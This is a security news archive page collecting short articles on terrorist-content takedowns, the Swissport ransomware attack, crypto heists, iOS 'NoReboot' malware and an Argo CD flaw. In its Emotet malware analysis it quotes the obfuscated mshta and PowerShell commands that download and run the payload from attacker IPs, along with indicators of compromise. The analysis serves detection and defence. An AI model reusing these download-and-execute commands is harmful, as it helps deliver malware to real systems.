Category Archives: News

European Police Flag 500+ Pieces of Terrorist Content

Read Time:1 Minute, 37 Second

European Police Flag 500+ Pieces of Terrorist Content

European police have found and referred 563 pieces of terrorist content to service providers in the region, as a UK man was jailed for sharing a bomb-making manual online.

The Referral Action Day took place last week at Europol’s headquarters. The EU’s Internet Referral Unit (EU IRU) coordinated the referral activity with specialized counter-terrorism units from France, Germany, Hungary, Italy, the Netherlands, Portugal, Spain, Switzerland and the UK.

In particular, they were looking for content on “explosive chemical precursors” being shared online by terrorist-supporting networks, including jihadists. This refers to content such as bomb-making tutorials and information on carrying out terrorist attacks.

The content found on 106 websites and platforms will now be assessed by the relevant online service providers against their terms and conditions.

Last November, over 20 websites in Germany and the UK were suspended by service providers for disseminating online terrorist propaganda – fewer than half the number of sites originally flagged by police.

However, a new EU regulation will soon give the authorities the power to demand the removal of online terrorist content.

The news comes after a 19-year-old UK man was sentenced to 42 months in jail for sharing a bomb-making manual on social media.

Connor Burke, from southeast London, pleaded guilty at Woolwich Crown Court to disseminating a terrorist publication that contained information on how to create improvised explosive devices (IEDs).

He also pleaded guilty to four counts of possession of a document “likely to be useful” to a would-be terrorist.

“Burke had an unhealthy interest in extreme right-wing terrorist ideology, and this led to him sharing extremely dangerous material with others online,” argued Richard Smith, head of the Metropolitan Police’s Counter Terrorism Command.

“Increasingly, we’re seeing young people being drawn into extremist ideologies, some of whom – like Burke – then go on to commit serious terrorism offenses.

Read More

Swissport Ransomware Attack Delayed Flights

Read Time:1 Minute, 49 Second

Swissport Ransomware Attack Delayed Flights

Airport services giant Swissport is restoring its IT systems after a ransomware attack struck late last week, delaying flights.

The Zurich-headquartered firm operates everything from check-in gates and airport security to baggage handling, aircraft fuelling and de-icing and lounge hospitality. It claims to have provided ground services to 97 million passengers last year and handled over five million tons of air freight.

Swissport took to Twitter on Friday to warn its IT infrastructure had been hit by ransomware and apologize for any impact on service delivery.

However, a day later, the firm appeared to have things back under control.

“IT security incident at #Swissport contained,” it tweeted. “Affected infrastructure swiftly taken offline. Manual workarounds or fallback systems secured operation at all times. Full system clean-up and restoration now under way. We apologize for any inconvenience.”

It’s unclear exactly how severely the outage impacted its many clients around the globe. However, one report from German media revealed it led to temporary delays at Zurich airport.

“Due to system problems at our airport partner Swissport, 22 flights were delayed by three to 20 minutes yesterday,” a spokeswoman for the airport is quoted as saying.

The attackers are believed to have struck early in the morning of Thursday February 3. By Friday, there was no significant impact on operations at Zurich airport.

Backup procedures reportedly kicked in during the outage so that there was no impact on aircraft crews. However, a Swissport spokesperson reportedly admitted: “there may be delays in some cases.”

The news follows a series of attacks and disruptions at European ports and oil terminals over the past week, impacting fuel supply chains at a time of rising prices and heightened concern over the possible knock-on effect of Russia invading Ukraine.

“Whether the surge in attacks is related to current geopolitical events is unknown,” said Andy Norton, European cyber-risk officer at Armis.

“However, providers of critical services should immediately review the adequacy of their risk assessments, with emphasis on the criticality of ancillary IT systems that have increased connectivity, and the potential to impact OT and ICS production and service delivery.”

Read More

CISOs are burned out and falling behind

Read Time:45 Second

The CISO’s text was brief but telling: “I never want an operational role again,” it read, arriving on Jeff Pollard’s phone in December as security teams scrambled to deal with the latest headline-making threat, Log4j.

“He’s an effective CISO with a long tenure, but his mentality was ‘Here we go again.’ He was speaking to the herculean effort he knew he and his team would have to make. No one needed more of that. And it was sort of like, ‘I’m done,’” says Pollard, vice president and principal analyst with Forrester Research.

Most workers—most people, for that matter—have had that I’m done feeling at one time or another; studies today are finding, in fact, that many individuals are feeling overwhelmed and worn down by the pandemic and all the disruptions it has brought.

To read this article in full, please click here

Read More

Social engineering: Definition, examples, and techniques

Read Time:27 Second

What is social engineering?

Social engineering is the art of exploiting human psychology, rather than technical hacking techniques, to gain access to buildings, systems, or data.

For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

[ Learn what makes these 6 social engineering techniques so effective. | Get the latest from CSO by signing up for our newsletters. ]

To read this article in full, please click here

Read More

Crypto Firm Meter Loses $4.4m in Cyber-Heist

Read Time:1 Minute, 35 Second

Crypto Firm Meter Loses $4.4m in Cyber-Heist

Yet another cryptocurrency firm has been hacked to the tune of millions of dollars.

Meter provides decentralized finance (DeFi) infrastructure services, linking siloed blockchains for users with so-called “cross-chain bridges.”

Over the weekend, it revealed that an unauthorized intruder had managed to exploit a bridge vulnerability to mint a large number of Binance Coins (BNB) and wrapped Ethereum (WETH), while running down its reserves.

After halting bridge transactions immediately, the firm investigated the source of the bug.

“The extended code had a wrong trust assumption which allowed hacker to call the underlying ERC20 deposit function to fake an BNB or ETH transfer,” it explained on Twitter.

“The only impacted tokens were native gas tokens (WETH and BNB), and only Meter and Moonriver networks were impacted.”

Meter admitted it lost $4.4m in the raid but said it would compensate those affected while working with the authorities to trace its attacker.

“We urge all the liquidity providers that provide liquidity involving WETH and BNB to remove liquidity from the pool and wait for an additional announcement from the Meter team,” it added. “Please try avoid trading in these pairs as well.”

Meter urged the hacker to return the funds but has not publicly offered its assailant a bug bounty reward for their safe return, as did two other crypto firms compromised last week.

DeFi provider Quibit Finance proffered a reward of $2m to its attackers and a promise not to press charges after they made off with $80m.

Then a few days later, another cross-chain bridge provider, Wormhole, lost an estimated $322m after attackers stole 120,000 ETH. This time it offered a staggering $10m to the hacker.

A few days later, proprietary trading firm Jump Trading said it replenished those funds “to make community members whole and support Wormhole now as it continues to develop.”

Read More

How iOS Malware May Snoop on Our Devices

Read Time:6 Minute, 24 Second

Smartphones have become such an integral part of our lives that it’s hard to imagine a time when we didn’t have them. We carry so much of our lives on our devices, from our social media accounts and photos of our pets to our banking information and home addresses. Whether it be just for fun or for occupational purposes, so much of our time and attention is spent on our smartphones. 

Because our mobile devices carry so much valuable information, it’s important that we stay educated on the latest cyber schemes so we can be prepared to combat them and keep our data safe.  According to Bleeping Computer, researchers have developed a trojan proof of concept tool that fakes a shutdown or reboot of iPhones, preventing malware from being removed and allowing hackers to secretly snoop on microphones and cameras.  

Let’s dive into the details of this technique.  

How “NoReboot” allows hackers to spy on a device 

Typically, when an iOS device is infected with malware, the solution is as simple as just restarting the device. However, with this new technique researchers are calling “NoReboot,” ridding a device of malware is not quite as simple. 

“NoReboot” blocks the shutdown and reboot process from being carried out, preventing the device from actually restarting. Without a proper shutdown and reboot, a malware infection on an iOS device can continue to exist. Because the device appears to be shut off with a dark screen, muted notifications, and a lack of response, it is easy to assume that the device has shut down properly and the problem has been solved. However, the “NoReboot” technique has only simulated a reboot, allowing a hacker to access the device and its functions, such as its camera and microphone. If a hacker has access to these functions, they could record the user without their knowledge and potentially capture private information.  

This attack is not one that Apple can fix, as it relies on human-level deception rather than exploiting flaws found on iOS. That’s why it’s important that we know how to use our devices safely and stay protected. 

How to know if your smartphone has been hacked 

As previously mentioned, smartphone usage takes up a big chunk of our time and attention. Since we are so often on these devices, it is usually fairly easy to tell when something isn’t working quite like it is supposed to. While these things could very well just be technical issues, sometimes they are much more than that, such as malware being downloaded onto your smartphone. 

Malware can eat up the system resources or conflict with other apps on your device, causing it to act oddly. 

Some possible signs that your device has been hacked include: 

Performance issues 

A slower device, webpages taking way too long to load, or a battery that never keeps a charge are all things that can be attributed to a device reaching its retirement. However, these things may also be signs that malware has compromised your phone. 

Your phone feels like it’s running hot 

Malware running in the background of a device may burn extra computing power, causing your phone to feel hot and overheated. If your device is quick to heat up, it may be due to malicious activity. 

Mysterious calls, texts, or apps appear 

If apps you haven’t downloaded suddenly appear on your screen, or if outgoing calls you don’t remember making pop up on your phone bill, that is a definite red flag and a potential sign that your device has been hacked. 

Pop-ups or changes to your screen 

Malware may also be the cause of odd or frequent pop-ups, as well as changes made to your home screen. If you are getting an influx of spammy ads or your app organization is suddenly out of order, there is a big possibility that your device has been hacked. 

Six tips to prevent your phone from being hacked 

To avoid the hassle of having a hacked phone in the first place, here are some tips that may help. 

1. Update your phone and its apps

Promptly updating your phone and apps is a primary way to keep your device safe. Updates often fix bugs and vulnerabilities that hackers rely on to download malware for their attacks. 

2. Avoid downloading from third-party app stores

Apple’s App Store and Google Play have protections in place to help ensure that apps being downloaded are safe. Third-party sites may not have those same protections or may even be purposely hosting malicious apps to scam users. Avoiding these sites altogether can prevent these apps from allowing hackers into your device. 

3. Stay safer on the go with a VPN

Hackers may use public Wi-Fi to gain access to your device and the information you have inside of it. Using a VPN to ensure that your network is private and only you can access it is a great way to stay protected on the go. 

4. Turn off your Wi-Fi and Bluetooth when not in use

Turning off your Wi-Fi and Bluetooth when you are not actively using them is a simple way to prevent skilled hackers from working their way into your devices. 

5. Avoid public charging stations

Some hackers have been known to install malware into public charging stations and hack into devices while they are being charged. Investing in your own personal portable charging packs is an easy way to avoid this type of hack.  

6. Encrypt your phone

Encrypting your phone can protect your calls, messages, and information, while also protecting you from being hacked. iPhone users can check their encryption status by going into Touch ID & Passcode, scrolling to the bottom, and seeing if data protection is enabled.  

7. Determine whether your device rebooted properly

Although researchers agree that you can never trust a device to be fully off, there are some techniques that can help you determine whether your device was rebooted correctly.2 If you do suspect that your phone was hacked or notice some suspicious activity, restart your device. To do this, press and hold the power button and either volume button until you are prompted to slide the button on the screen to power off. After the device shuts down and restarts, notice if you are prompted to enter your passcode to unlock the device. If not, this is an indicator that a fake reboot just occurred. If this happens, you can wait for the device to run out of battery, although researchers have not verified that this will completely remove the threat.  

Stay protected 

If you are worried that your device has been hacked, follow these steps: 

Install and run security software on your smartphone if you haven’t already. From there, delete any apps you didn’t download, delete risky texts, and then run your mobile security software again. 
If you still have issues, wiping and restoring your phone is an option. Provided you have your photos, contacts, and other vital info backed up in the cloud, it’s a relatively straightforward process. A quick search online can show how to wipe and restore your model of phone. 
Lastly, check your accounts and your credit to see if any unauthorized purchases have been made. If so, you can go through the process of freezing those accounts, getting new cards, and credentials issued with the help of McAfee Identity Protection Service. Further, update your passwords for your accounts with a password that is strong and unique

The post How iOS Malware May Snoop on Our Devices appeared first on McAfee Blog.

Read More

Emotet’s Uncommon Approach of Masking IP Addresses

Read Time:3 Minute, 26 Second

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

The initial attack vector is a phishing email with a Microsoft Excel attachment. 
Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT
OBFUSCATED CMD
DEOBFUSCATED CMD

Hexadecimal
cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html
http://185[.]7[.]214[.]7/fer/fer.html

Octal
cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html
http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:UsersPublicDocumentsssd.dll”.

cmd line
(New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line
cmd  /c C:WindowsSysWow64rundll32.exe C:UsersPublicDocumentsssd.dll,AnyString

IOC

TYPE
VALUE
SCANNER
DETECTION NAME

XLS
06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c
McAfee LiveSafe and Total Protection
X97M/Downloader.nn

DLL
a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3
McAfee LiveSafe and Total Protection

 

Emotet-FSY

HTML URL
http://185[.]7[.]214[.]7/fer/fer.html

http://46[.]105[.]81[.]76/c.html

WebAdvisor
Blocked

DLL URL
http://185[.]7[.]214[.]7/fer/fer.png

http://46[.]105[.]81[.]76/cc.png

WebAdvisor
Blocked

MITRE ATT&CK

TECHNIQUE ID
TACTIC
TECHNIQUE DETAILS
DESCRIPTION

T1566
Initial access
Phishing attachment
Initial maldoc uses phishing strings to convince users to open the maldoc

T1204
Execution
User Execution
Manual execution by user

T1071
Command and Control
Standard Application Layer Protocol
Attempts to connect through HTTP

T1059
Command and Scripting Interpreter
Starts CMD.EXE for commands execution
Excel uses cmd and PowerShell to execute command

T1218

 

Signed Binary Proxy Execution
Uses RUNDLL32.EXE and MSHTA.EXE to load library
rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Read More

FBI’s warning about Iranian firm highlights common cyberattack tactics

Read Time:35 Second

The US Federal Bureau of Investigation (FBI) has released a warning outlining the TTP (tactics, techniques, and protocols) of Iran-based Emennet Pasargad, reportedly a cybersecurity and intelligence firm servicing Iranian government agencies, to help recipients inform and defend themselves against the group’s malicious activities. 

In the FBI’s Private Industry Notification, the agency confirms that two Iranian nationals employed by Emennet were charged with cyberintrusion and fraud, voter intimidation, interstate threats, and conspiracy by the US Department of Justice.

Additionally, the Department of Treasury Office of Foreign Assets Control alleges that  Emennet, along with the two accused Iranian nationals, attempted to influence the 2020 US presidential elections. 

To read this article in full, please click here

Read More

Major Vulnerability Found in Argo CD

Read Time:1 Minute, 49 Second

Major Vulnerability Found in Argo CD

Security researchers at Apiiro have discovered a significant software supply chain zero-day vulnerability in the popular open-source continuous delivery platform, Argo CD.

Used by thousands of organizations globally, Argo CD is a tool that reads environment configurations (written as a helm chart, kustomize files, jsonnet or plain YAML files) from git repositories and applies it Kubernetes namespaces. The platform can manage the execution and monitoring of application deployment post-integration.

The flaw (CVE-2022-24348) lets attackers access and exfiltrate sensitive information such as passwords and API keys.

“A 0-day vulnerability, discovered by Apiiro’s Security Research team, allows malicious actors to load a Kubernetes Helm Chart YAML file to the vulnerability and ‘hop’ from their application ecosystem to other applications’ data outside of the user’s scope,” wrote researchers.

Exploitation of the flaw can lead to privilege escalation, sensitive information disclosure, lateral movement attacks and more.

The attack begins with the threat actor constructing a malicious Kubernetes Helm Chart-a YAML file that embeds different fields to form a declaration of resources and configurations needed in order for deploying an application.

Using the Helm Chart, the attacker builds a dummy configuration to exploit a parsing confusion vulnerability to access restricted information.

Finally, the attacker extracts sensitive data such as API keys and passwords that can be leveraged to carry up follow-up attacks and facilitate lateral movement inside the victim’s network. 

Apiiro reported the attack to Argo CD on January 30 2022. After discussing the vulnerability’s extent and impact, the vendor created a patch to fix the problem. Advisories and the patch were released on Thursday. 

Apiiro’s research team praised Argo CD’s incident response and “professional handling of the case.”

“We are seeing more advanced persistent threats that leverage zero day and known, unmitigated vulnerabilities in software supply chain software such as Argo CD,” commented Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber.

He added: “For years, known, unmitigated vulnerabilities have contributed more than any other factor to mounting cyber risk. But hackers are always looking for the most-effective path of least resistance to attain their objectives.”

Read More